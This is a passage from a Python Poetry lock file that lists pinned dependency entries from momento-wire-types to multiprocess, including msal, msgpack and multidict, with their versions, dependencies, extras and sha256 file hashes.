"momento_wire_types-0.86.0-py3-none-any.whl", hash = "sha256:1079f61f3a0aa90865870b116a8699289e6f03b969a349265abdd605b073251c"}, {file = "momento_wire_types-0.86.0.tar.gz", hash = "sha256:7695a448382fbfda8ad7a51c307b34a2ef3d81d883f77b71891c27a4c25aed18"}, ] [package.dependencies] grpcio = "*" protobuf = ">=3,<5" [[package]] name = "more-itertools" version = "10.1.0" description = "More routines for operating on iterables, beyond itertools" optional = true python-versions = ">=3.8" files = [ {file = "more-itertools-10.1.0.tar.gz", hash = "sha256:626c369fa0eb37bac0291bce8259b332fd59ac792fa5497b59837309cd5b114a"}, {file = "more_itertools-10.1.0-py3-none-any.whl", hash = "sha256:64e0735fcfdc6f3464ea133afe8ea4483b1c5fe3a3d69852e6503b43a0b222e6"}, ] [[package]] name = "motor" version = "3.3.1" description = "Non-blocking MongoDB driver for Tornado or asyncio" optional = 
true python-versions = ">=3.7" files = [ {file = "motor-3.3.1-py3-none-any.whl", hash = "sha256:a0dee83ad0d47b353932ac37467ba397b1e649ce7e3eea7f5a90554883d7cdbe"}, {file = "motor-3.3.1.tar.gz", hash = "sha256:c5eb400e27d722a3db03a9826656b6d13acf9b6c70c2fb4604f474eac9da5be4"}, ] [package.dependencies] pymongo = ">=4.5,<5" [package.extras] aws = ["pymongo[aws] (>=4.5,<5)"] encryption = ["pymongo[encryption] (>=4.5,<5)"] gssapi = ["pymongo[gssapi] (>=4.5,<5)"] ocsp = ["pymongo[ocsp] (>=4.5,<5)"] snappy = ["pymongo[snappy] (>=4.5,<5)"] srv = ["pymongo[srv] (>=4.5,<5)"] test = ["aiohttp", "mockupdb", "motor[encryption]", "pytest (>=7)", "tornado (>=5)"] zstd = ["pymongo[zstd] (>=4.5,<5)"] [[package]] name = "mpmath" version = "1.3.0" description = "Python library for arbitrary-precision floating-point arithmetic" optional = true python-versions = "*" files = [ {file = "mpmath-1.3.0-py3-none-any.whl", hash = "sha256:a0b2b9fe80bbcd81a6647ff13108738cfb482d481d826cc0e02f5b35e5c88d2c"}, {file = "mpmath-1.3.0.tar.gz", hash = "sha256:7a28eb2a9774d00c7bc92411c19a89209d5da7c4c9a9e227be8330a23a25b91f"}, ] [package.extras] develop = ["codecov", "pycodestyle", "pytest (>=4.6)", "pytest-cov", "wheel"] docs = ["sphinx"] gmpy = ["gmpy2 (>=2.1.0a4)"] tests = ["pytest (>=4.6)"] [[package]] name = "msal" version = "1.24.1" description = "The Microsoft Authentication Library (MSAL) for Python library" optional = true python-versions = ">=2.7" files = [ {file = "msal-1.24.1-py2.py3-none-any.whl", hash = "sha256:ce4320688f95c301ee74a4d0e9dbcfe029a63663a8cc61756f40d0d0d36574ad"}, {file = "msal-1.24.1.tar.gz", hash = "sha256:aa0972884b3c6fdec53d9a0bd15c12e5bd7b71ac1b66d746f54d128709f3f8f8"}, ] [package.dependencies] cryptography = ">=0.6,<44" PyJWT = {version = ">=1.0.0,<3", extras = ["crypto"]} requests = ">=2.0.0,<3" [package.extras] broker = ["pymsalruntime (>=0.13.2,<0.14)"] [[package]] name = "msal-extensions" version = "1.0.0" description = "Microsoft Authentication Library extensions (MSAL EX) provides a persistence API that can save your data on disk, encrypted on Windows, macOS and Linux. Concurrent data access will be coordinated by a file lock mechanism." 
optional = true python-versions = "*" files = [ {file = "msal-extensions-1.0.0.tar.gz", hash = "sha256:c676aba56b0cce3783de1b5c5ecfe828db998167875126ca4b47dc6436451354"}, {file = "msal_extensions-1.0.0-py2.py3-none-any.whl", hash = "sha256:91e3db9620b822d0ed2b4d1850056a0f133cba04455e62f11612e40f5502f2ee"}, ] [package.dependencies] msal = ">=0.4.1,<2.0.0" portalocker = [ {version = ">=1.0,<3", markers = "python_version >= \"3.5\" and platform_system != \"Windows\""}, {version = ">=1.6,<3", markers = "python_version >= \"3.5\" and platform_system == \"Windows\""}, ] [[package]] name = "msgpack" version = "1.0.7" description = "MessagePack serializer" optional = true python-versions = ">=3.8" files = [ {file = "msgpack-1.0.7-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:04ad6069c86e531682f9e1e71b71c1c3937d6014a7c3e9edd2aa81ad58842862"}, {file = "msgpack-1.0.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:cca1b62fe70d761a282496b96a5e51c44c213e410a964bdffe0928e611368329"}, {file = "msgpack-1.0.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e50ebce52f41370707f1e21a59514e3375e3edd6e1832f5e5235237db933c98b"}, {file = "msgpack-1.0.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a7b4f35de6a304b5533c238bee86b670b75b03d31b7797929caa7a624b5dda6"}, {file = "msgpack-1.0.7-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:28efb066cde83c479dfe5a48141a53bc7e5f13f785b92ddde336c716663039ee"}, {file = "msgpack-1.0.7-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4cb14ce54d9b857be9591ac364cb08dc2d6a5c4318c1182cb1d02274029d590d"}, {file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:b573a43ef7c368ba4ea06050a957c2a7550f729c31f11dd616d2ac4aba99888d"}, {file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:ccf9a39706b604d884d2cb1e27fe973bc55f2890c52f38df742bc1d79ab9f5e1"}, {file = "msgpack-1.0.7-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:cb70766519500281815dfd7a87d3a178acf7ce95390544b8c90587d76b227681"}, {file = "msgpack-1.0.7-cp310-cp310-win32.whl", hash = "sha256:b610ff0f24e9f11c9ae653c67ff8cc03c075131401b3e5ef4b82570d1728f8a9"}, {file = "msgpack-1.0.7-cp310-cp310-win_amd64.whl", hash = "sha256:a40821a89dc373d6427e2b44b572efc36a2778d3f543299e2f24eb1a5de65415"}, {file = "msgpack-1.0.7-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:576eb384292b139821c41995523654ad82d1916da6a60cff129c715a6223ea84"}, {file = "msgpack-1.0.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:730076207cb816138cf1af7f7237b208340a2c5e749707457d70705715c93b93"}, {file = "msgpack-1.0.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:85765fdf4b27eb5086f05ac0491090fc76f4f2b28e09d9350c31aac25a5aaff8"}, {file = "msgpack-1.0.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3476fae43db72bd11f29a5147ae2f3cb22e2f1a91d575ef130d2bf49afd21c46"}, {file = "msgpack-1.0.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d4c80667de2e36970ebf74f42d1088cc9ee7ef5f4e8c35eee1b40eafd33ca5b"}, {file = "msgpack-1.0.7-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5b0bf0effb196ed76b7ad883848143427a73c355ae8e569fa538365064188b8e"}, {file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:f9a7c509542db4eceed3dcf21ee5267ab565a83555c9b88a8109dcecc4709002"}, {file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_i686.whl", hash = 
"sha256:84b0daf226913133f899ea9b30618722d45feffa67e4fe867b0b5ae83a34060c"}, {file = "msgpack-1.0.7-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:ec79ff6159dffcc30853b2ad612ed572af86c92b5168aa3fc01a67b0fa40665e"}, {file = "msgpack-1.0.7-cp311-cp311-win32.whl", hash = "sha256:3e7bf4442b310ff154b7bb9d81eb2c016b7d597e364f97d72b1acc3817a0fdc1"}, {file = "msgpack-1.0.7-cp311-cp311-win_amd64.whl", hash = "sha256:3f0c8c6dfa6605ab8ff0611995ee30d4f9fcff89966cf562733b4008a3d60d82"}, {file = "msgpack-1.0.7-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:f0936e08e0003f66bfd97e74ee530427707297b0d0361247e9b4f59ab78ddc8b"}, {file = "msgpack-1.0.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:98bbd754a422a0b123c66a4c341de0474cad4a5c10c164ceed6ea090f3563db4"}, {file = "msgpack-1.0.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:b291f0ee7961a597cbbcc77709374087fa2a9afe7bdb6a40dbbd9b127e79afee"}, {file = "msgpack-1.0.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ebbbba226f0a108a7366bf4b59bf0f30a12fd5e75100c630267d94d7f0ad20e5"}, {file = "msgpack-1.0.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1e2d69948e4132813b8d1131f29f9101bc2c915f26089a6d632001a5c1349672"}, {file = "msgpack-1.0.7-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:bdf38ba2d393c7911ae989c3bbba510ebbcdf4ecbdbfec36272abe350c454075"}, {file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:993584fc821c58d5993521bfdcd31a4adf025c7d745bbd4d12ccfecf695af5ba"}, {file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:52700dc63a4676669b341ba33520f4d6e43d3ca58d422e22ba66d1736b0a6e4c"}, {file = "msgpack-1.0.7-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:e45ae4927759289c30ccba8d9fdce62bb414977ba158286b5ddaf8df2cddb5c5"}, {file = "msgpack-1.0.7-cp312-cp312-win32.whl", hash = "sha256:27dcd6f46a21c18fa5e5deed92a43d4554e3df8d8ca5a47bf0615d6a5f39dbc9"}, {file = "msgpack-1.0.7-cp312-cp312-win_amd64.whl", hash = "sha256:7687e22a31e976a0e7fc99c2f4d11ca45eff652a81eb8c8085e9609298916dcf"}, {file = "msgpack-1.0.7-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5b6ccc0c85916998d788b295765ea0e9cb9aac7e4a8ed71d12e7d8ac31c23c95"}, {file = "msgpack-1.0.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:235a31ec7db685f5c82233bddf9858748b89b8119bf4538d514536c485c15fe0"}, {file = "msgpack-1.0.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:cab3db8bab4b7e635c1c97270d7a4b2a90c070b33cbc00c99ef3f9be03d3e1f7"}, {file = "msgpack-1.0.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0bfdd914e55e0d2c9e1526de210f6fe8ffe9705f2b1dfcc4aecc92a4cb4b533d"}, {file = "msgpack-1.0.7-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:36e17c4592231a7dbd2ed09027823ab295d2791b3b1efb2aee874b10548b7524"}, {file = "msgpack-1.0.7-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:38949d30b11ae5f95c3c91917ee7a6b239f5ec276f271f28638dec9156f82cfc"}, {file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:ff1d0899f104f3921d94579a5638847f783c9b04f2d5f229392ca77fba5b82fc"}, {file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:dc43f1ec66eb8440567186ae2f8c447d91e0372d793dfe8c222aec857b81a8cf"}, {file = "msgpack-1.0.7-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:dd632777ff3beaaf629f1ab4396caf7ba0bdd075d948a69460d13d44357aca4c"}, {file = 
"msgpack-1.0.7-cp38-cp38-win32.whl", hash = "sha256:4e71bc4416de195d6e9b4ee93ad3f2f6b2ce11d042b4d7a7ee00bbe0358bd0c2"}, {file = "msgpack-1.0.7-cp38-cp38-win_amd64.whl", hash = "sha256:8f5b234f567cf76ee489502ceb7165c2a5cecec081db2b37e35332b537f8157c"}, {file = "msgpack-1.0.7-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bfef2bb6ef068827bbd021017a107194956918ab43ce4d6dc945ffa13efbc25f"}, {file = "msgpack-1.0.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:484ae3240666ad34cfa31eea7b8c6cd2f1fdaae21d73ce2974211df099a95d81"}, {file = "msgpack-1.0.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3967e4ad1aa9da62fd53e346ed17d7b2e922cba5ab93bdd46febcac39be636fc"}, {file = "msgpack-1.0.7-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8dd178c4c80706546702c59529ffc005681bd6dc2ea234c450661b205445a34d"}, {file = "msgpack-1.0.7-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f6ffbc252eb0d229aeb2f9ad051200668fc3a9aaa8994e49f0cb2ffe2b7867e7"}, {file = "msgpack-1.0.7-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:822ea70dc4018c7e6223f13affd1c5c30c0f5c12ac1f96cd8e9949acddb48a61"}, {file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:384d779f0d6f1b110eae74cb0659d9aa6ff35aaf547b3955abf2ab4c901c4819"}, {file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:f64e376cd20d3f030190e8c32e1c64582eba56ac6dc7d5b0b49a9d44021b52fd"}, {file = "msgpack-1.0.7-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5ed82f5a7af3697b1c4786053736f24a0efd0a1b8a130d4c7bfee4b9ded0f08f"}, {file = "msgpack-1.0.7-cp39-cp39-win32.whl", hash = "sha256:f26a07a6e877c76a88e3cecac8531908d980d3d5067ff69213653649ec0f60ad"}, {file = "msgpack-1.0.7-cp39-cp39-win_amd64.whl", hash = "sha256:1dc93e8e4653bdb5910aed79f11e165c85732067614f180f70534f056da97db3"}, {file = "msgpack-1.0.7.tar.gz", hash = "sha256:572efc93db7a4d27e404501975ca6d2d9775705c2d922390d878fcf768d92c87"}, ] [[package]] name = "msrest" version = "0.7.1" description = "AutoRest swagger generator Python client runtime." 
optional = true python-versions = ">=3.6" files = [ {file = "msrest-0.7.1-py3-none-any.whl", hash = "sha256:21120a810e1233e5e6cc7fe40b474eeb4ec6f757a15d7cf86702c369f9567c32"}, {file = "msrest-0.7.1.zip", hash = "sha256:6e7661f46f3afd88b75667b7187a92829924446c7ea1d169be8c4bb7eeb788b9"}, ] [package.dependencies] azure-core = ">=1.24.0" certifi = ">=2017.4.17" isodate = ">=0.6.0" requests = ">=2.16,<3.0" requests-oauthlib = ">=0.5.0" [package.extras] async = ["aiodns", "aiohttp (>=3.0)"] [[package]] name = "multidict" version = "6.0.4" description = "multidict implementation" optional = false python-versions = ">=3.7" files = [ {file = "multidict-6.0.4-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:0b1a97283e0c85772d613878028fec909f003993e1007eafa715b24b377cb9b8"}, {file = "multidict-6.0.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:eeb6dcc05e911516ae3d1f207d4b0520d07f54484c49dfc294d6e7d63b734171"}, {file = "multidict-6.0.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:d6d635d5209b82a3492508cf5b365f3446afb65ae7ebd755e70e18f287b0adf7"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c048099e4c9e9d615545e2001d3d8a4380bd403e1a0578734e0d31703d1b0c0b"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ea20853c6dbbb53ed34cb4d080382169b6f4554d394015f1bef35e881bf83547"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:16d232d4e5396c2efbbf4f6d4df89bfa905eb0d4dc5b3549d872ab898451f569"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:36c63aaa167f6c6b04ef2c85704e93af16c11d20de1d133e39de6a0e84582a93"}, {file = "multidict-6.0.4-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:64bdf1086b6043bf519869678f5f2757f473dee970d7abf6da91ec00acb9cb98"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:43644e38f42e3af682690876cff722d301ac585c5b9e1eacc013b7a3f7b696a0"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:7582a1d1030e15422262de9f58711774e02fa80df0d1578995c76214f6954988"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:ddff9c4e225a63a5afab9dd15590432c22e8057e1a9a13d28ed128ecf047bbdc"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:ee2a1ece51b9b9e7752e742cfb661d2a29e7bcdba2d27e66e28a99f1890e4fa0"}, {file = "multidict-6.0.4-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:a2e4369eb3d47d2034032a26c7a80fcb21a2cb22e1173d761a162f11e562caa5"}, {file = "multidict-6.0.4-cp310-cp310-win32.whl", hash = "sha256:574b7eae1ab267e5f8285f0fe881f17efe4b98c39a40858247720935b893bba8"}, {file = "multidict-6.0.4-cp310-cp310-win_amd64.whl", hash = "sha256:4dcbb0906e38440fa3e325df2359ac6cb043df8e58c965bb45f4e406ecb162cc"}, {file = "multidict-6.0.4-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0dfad7a5a1e39c53ed00d2dd0c2e36aed4650936dc18fd9a1826a5ae1cad6f03"}, {file = "multidict-6.0.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:64da238a09d6039e3bd39bb3aee9c21a5e34f28bfa5aa22518581f910ff94af3"}, {file = "multidict-6.0.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ff959bee35038c4624250473988b24f846cbeb2c6639de3602c073f10410ceba"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:01a3a55bd90018c9c080fbb0b9f4891db37d148a0a18722b42f94694f8b6d4c9"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c5cb09abb18c1ea940fb99360ea0396f34d46566f157122c92dfa069d3e0e982"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:666daae833559deb2d609afa4490b85830ab0dfca811a98b70a205621a6109fe"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11bdf3f5e1518b24530b8241529d2050014c884cf18b6fc69c0c2b30ca248710"}, {file = "multidict-6.0.4-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7d18748f2d30f94f498e852c67d61261c643b349b9d2a581131725595c45ec6c"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:458f37be2d9e4c95e2d8866a851663cbc76e865b78395090786f6cd9b3bbf4f4"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:b1a2eeedcead3a41694130495593a559a668f382eee0727352b9a41e1c45759a"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:7d6ae9d593ef8641544d6263c7fa6408cc90370c8cb2bbb65f8d43e5b0351d9c"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:5979b5632c3e3534e42ca6ff856bb24b2e3071b37861c2c727ce220d80eee9ed"}, {file = "multidict-6.0.4-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:dcfe792765fab89c365123c81046ad4103fcabbc4f56d1c1997e6715e8015461"}, {file = "multidict-6.0.4-cp311-cp311-win32.whl", hash = "sha256:3601a3cece3819534b11d4efc1eb76047488fddd0c85a3948099d5da4d504636"}, {file = "multidict-6.0.4-cp311-cp311-win_amd64.whl", hash = "sha256:81a4f0b34bd92df3da93315c6a59034df95866014ac08535fc819f043bfd51f0"}, {file = "multidict-6.0.4-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:67040058f37a2a51ed8ea8f6b0e6ee5bd78ca67f169ce6122f3e2ec80dfe9b78"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:853888594621e6604c978ce2a0444a1e6e70c8d253ab65ba11657659dcc9100f"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:39ff62e7d0f26c248b15e364517a72932a611a9b75f35b45be078d81bdb86603"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:af048912e045a2dc732847d33821a9d84ba553f5c5f028adbd364dd4765092ac"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1e8b901e607795ec06c9e42530788c45ac21ef3aaa11dbd0c69de543bfb79a9"}, {file = "multidict-6.0.4-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62501642008a8b9871ddfccbf83e4222cf8ac0d5aeedf73da36153ef2ec222d2"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:99b76c052e9f1bc0721f7541e5e8c05db3941eb9ebe7b8553c625ef88d6eefde"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:509eac6cf09c794aa27bcacfd4d62c885cce62bef7b2c3e8b2e49d365b5003fe"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:21a12c4eb6ddc9952c415f24eef97e3e55ba3af61f67c7bc388dcdec1404a067"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:5cad9430ab3e2e4fa4a2ef4450f548768400a2ac635841bc2a56a2052cdbeb87"}, {file = "multidict-6.0.4-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:ab55edc2e84460694295f401215f4a58597f8f7c9466faec545093045476327d"}, {file = 
"multidict-6.0.4-cp37-cp37m-win32.whl", hash = "sha256:5a4dcf02b908c3b8b17a45fb0f15b695bf117a67b76b7ad18b73cf8e92608775"}, {file = "multidict-6.0.4-cp37-cp37m-win_amd64.whl", hash = "sha256:6ed5f161328b7df384d71b07317f4d8656434e34591f20552c7bcef27b0ab88e"}, {file = "multidict-6.0.4-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5fc1b16f586f049820c5c5b17bb4ee7583092fa0d1c4e28b5239181ff9532e0c"}, {file = "multidict-6.0.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1502e24330eb681bdaa3eb70d6358e818e8e8f908a22a1851dfd4e15bc2f8161"}, {file = "multidict-6.0.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b692f419760c0e65d060959df05f2a531945af31fda0c8a3b3195d4efd06de11"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:45e1ecb0379bfaab5eef059f50115b54571acfbe422a14f668fc8c27ba410e7e"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ddd3915998d93fbcd2566ddf9cf62cdb35c9e093075f862935573d265cf8f65d"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:59d43b61c59d82f2effb39a93c48b845efe23a3852d201ed2d24ba830d0b4cf2"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cc8e1d0c705233c5dd0c5e6460fbad7827d5d36f310a0fadfd45cc3029762258"}, {file = "multidict-6.0.4-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d6aa0418fcc838522256761b3415822626f866758ee0bc6632c9486b179d0b52"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:6748717bb10339c4760c1e63da040f5f29f5ed6e59d76daee30305894069a660"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:4d1a3d7ef5e96b1c9e92f973e43aa5e5b96c659c9bc3124acbbd81b0b9c8a951"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:4372381634485bec7e46718edc71528024fcdc6f835baefe517b34a33c731d60"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:fc35cb4676846ef752816d5be2193a1e8367b4c1397b74a565a9d0389c433a1d"}, {file = "multidict-6.0.4-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:4b9d9e4e2b37daddb5c23ea33a3417901fa7c7b3dee2d855f63ee67a0b21e5b1"}, {file = "multidict-6.0.4-cp38-cp38-win32.whl", hash = "sha256:e41b7e2b59679edfa309e8db64fdf22399eec4b0b24694e1b2104fb789207779"}, {file = "multidict-6.0.4-cp38-cp38-win_amd64.whl", hash = "sha256:d6c254ba6e45d8e72739281ebc46ea5eb5f101234f3ce171f0e9f5cc86991480"}, {file = "multidict-6.0.4-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:16ab77bbeb596e14212e7bab8429f24c1579234a3a462105cda4a66904998664"}, {file = "multidict-6.0.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:bc779e9e6f7fda81b3f9aa58e3a6091d49ad528b11ed19f6621408806204ad35"}, {file = "multidict-6.0.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:4ceef517eca3e03c1cceb22030a3e39cb399ac86bff4e426d4fc6ae49052cc60"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:281af09f488903fde97923c7744bb001a9b23b039a909460d0f14edc7bf59706"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:52f2dffc8acaba9a2f27174c41c9e57f60b907bb9f096b36b1a1f3be71c6284d"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b41156839806aecb3641f3208c0dafd3ac7775b9c4c422d82ee2a45c34ba81ca"}, {file = 
"multidict-6.0.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d5e3fc56f88cc98ef8139255cf8cd63eb2c586531e43310ff859d6bb3a6b51f1"}, {file = "multidict-6.0.4-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8316a77808c501004802f9beebde51c9f857054a0c871bd6da8280e718444449"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:f70b98cd94886b49d91170ef23ec5c0e8ebb6f242d734ed7ed677b24d50c82cf"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:bf6774e60d67a9efe02b3616fee22441d86fab4c6d335f9d2051d19d90a40063"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:e69924bfcdda39b722ef4d9aa762b2dd38e4632b3641b1d9a57ca9cd18f2f83a"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:6b181d8c23da913d4ff585afd1155a0e1194c0b50c54fcfe286f70cdaf2b7176"}, {file = "multidict-6.0.4-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:52509b5be062d9eafc8170e53026fbc54cf3b32759a23d07fd935fb04fc22d95"}, {file = "multidict-6.0.4-cp39-cp39-win32.whl", hash = "sha256:27c523fbfbdfd19c6867af7346332b62b586eed663887392cff78d614f9ec313"}, {file = "multidict-6.0.4-cp39-cp39-win_amd64.whl", hash = "sha256:33029f5734336aa0d4c0384525da0387ef89148dc7191aae00ca5fb23d7aafc2"}, {file = "multidict-6.0.4.tar.gz", hash = "sha256:3666906492efb76453c0e7b97f2cf459b0682e7402c0489a95484965dbc1da49"}, ] [[package]] name = "multiprocess" version = "0.70.15" description = "better multiprocessing and multithreading in Python" optional = true python-versions = ">=3.7" files = [ {file = "multiprocess-0.70.15-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:aa36c7ed16f508091438687fe9baa393a7a8e206731d321e443745e743a0d4e5"}, {file = "multiprocess-0.70.15-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = 